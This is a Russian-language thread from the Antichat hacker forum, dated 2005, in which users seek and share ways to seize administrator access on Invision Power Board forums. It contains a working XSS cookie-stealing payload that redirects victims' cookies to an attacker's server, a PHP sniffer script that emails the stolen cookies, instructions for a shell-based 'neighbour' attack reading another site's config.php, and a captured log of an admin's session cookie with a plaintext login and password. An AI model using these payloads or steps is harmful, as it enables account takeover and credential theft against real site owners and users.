Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   как получить админские сессии в Ipb 2.0.4? (https://forum.antichat.xyz/showthread.php?t=11258)

Danya 01.12.2005 23:05
как получить админские сессии в Ipb 2.0.4?
 
А есть какой нибудь эксплойт или способ получить админские сессии в Ipb 2.0.4.?

Barsik 02.12.2005 00:26
Попробуй скачать сплоит с www.rst.void.ru
Он тебе выдаст хэш с какойто двойной зашифровкой.
Если с ним позаморачиваться то можно узнать хэш который легко расшифровывается в PasswordPro И уже с пасом можешь бороздить по админским просторам :)

GreenBear 02.12.2005 00:35
Exploit DO 2.0.4, v 2.0.4 vrode netu sqlinj

Danya 02.12.2005 02:07
2 Барсик

я не совсем поняла? всмысле так я получу хеш пасса админа с солью? дык он у меня уже есть :-) бручу уже третьи сутки :-))) и очень сомневаюсь что расбручу. у меня немного другая заморочка- как поиметь доступ к админской панели без расшифрованого пасса )))))

Danya 02.12.2005 02:15
2Green_Bear

извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :-))) и если да, то чето я в поисковике ничего похожего найти пока немогу

Barsik 02.12.2005 13:49
Цитата:
Сообщение от Danya
2 Барсик
как поиметь доступ к админской панели без расшифрованого пасса )))))
А никак. Чтоб в админку попасть надо знать пасс админа.

MageDealer 02.12.2005 22:42
Цитата:
Сообщение от Danya
2Green_Bear

извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :-))) и если да, то чето я в поисковике ничего похожего найти пока немогу
DO 2.0.4
до 2.0.4
< 2.04

Danya 04.12.2005 00:43
ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?

Azazel 04.12.2005 00:53
Цитата:
Сообщение от Danya
ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?
Залить шелл на какой-нибудь простенький сайт на том-же серваке (узнать на domaindb.net), а от туда уже танцевать. Но это уже другая тема.

Danya 04.12.2005 01:00
2Azazel
угу. спасибо. тогда уж удьте так любезны, если вдруг тут обсуждлось нечто подобное, киньте хоть название топика. потому что по поисковику тут я не нашла. а весь форум читать буду очень долго

Azazel 04.12.2005 01:11
>>> форум читать буду очень долго
Долго, но полезно :-)

А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит.

Это же всё-таки не инструкция к микроволновой печке. :)

Danya 04.12.2005 01:30
ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((

Danya 04.12.2005 03:51
2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?

FHT 04.12.2005 12:42
Цитата:
Сообщение от Danya
2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно...Тока в админке можна и хеши посмотреть на юзерей...

Azazel 04.12.2005 12:50
Цитата:
Сообщение от Danya
2Azazel

мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.

Lord Nikon 06.12.2005 18:46
это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).

Danya 08.12.2005 03:21
через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((

Azazel 08.12.2005 03:41
Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
Получаем примерно /my/seycas/na/site/111/www/html/
Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
Теоретически - это сработает. Практически, зависит от сервера.

Alias 08.12.2005 08:18
как делал я
 
Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
<?php
if(isset($QUERY_STRING));
{
$date=date('d.m.y:H:i:s');
mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\ nCookie:$QUERY_STRING");
}
header('Content-Type=text/html\n\n\n\n');
echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
"Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
"Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
"прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
"достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
"Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
"того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
"вообще больше \"баб не цепляет\".\n" .
" \n" .
"Гоша Севастопольский" .
"</pre></body></html>";
?>

в результате на мыло приходят cookies с хешами паролей )) просто и сердито.

Естественно удача тут очень сильно влияет

Гаврила 09.12.2005 08:44
Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>

FQziT 09.12.2005 14:26
Цитата:
Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/abcd.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>
Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)

Гаврила 10.12.2005 08:08
Цитата:
Сообщение от <<YaYaYa>>
Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)
Там проблема в другом была.Спасибо,уже разобрался.

Danya 10.12.2005 19:56
а кто нибудь пробовал чтонибудь делать с аттачментами, которые пишутся в папку uploads? там проблема в том, что расширение мняется или в чем то еще? это я к тому что можно ли както аттачментом залить шелл, а потом его както использовать?

FHT 10.12.2005 20:23
АХТУНГ!!!
 
Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли
куки админа, содержащие логин и пасс в ОТКРЫТОМ виде. (Атаковался IPB 2.0.1)
-------------------------------------
Код:
IP: *.*.*.100
REFERER: http://***/forum/index.php?showtopic=175&st=80
QUERY: 69&member_id=1; pass_hash=f8447ce02eba492abe3249294aed4bf4;
forum_read=a:10:
{i:3;i:1134211808;i:2;i:1134174577;i:8;i:1134218332;i:
11;i:1134081264;i:13;i:1133595567;i:7;i:1133683890;i:
12;i:1133683875;i:10;i:1134174724;i:5;i:1133951226;i:
6;i:1134221372;};
acpcollapseprefs=100,200,900,1400; anonlogin=-1;
topicmode=linear; slogin=ariman;spass=tornado;
session_id=dcbf597a8db2190e362cf4ffd8b15dcb;
modtids=,; topicsread=a:1:{i:175;i:1134231356;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; SV1)
-------------------------------------
Как так получилось? Ответ:
В том случае если админ лезет модерировать форум и видит вашу мессагу,
к вам придет логин и пасс в открытом виде.
Проверено-канает.


Время: 05:21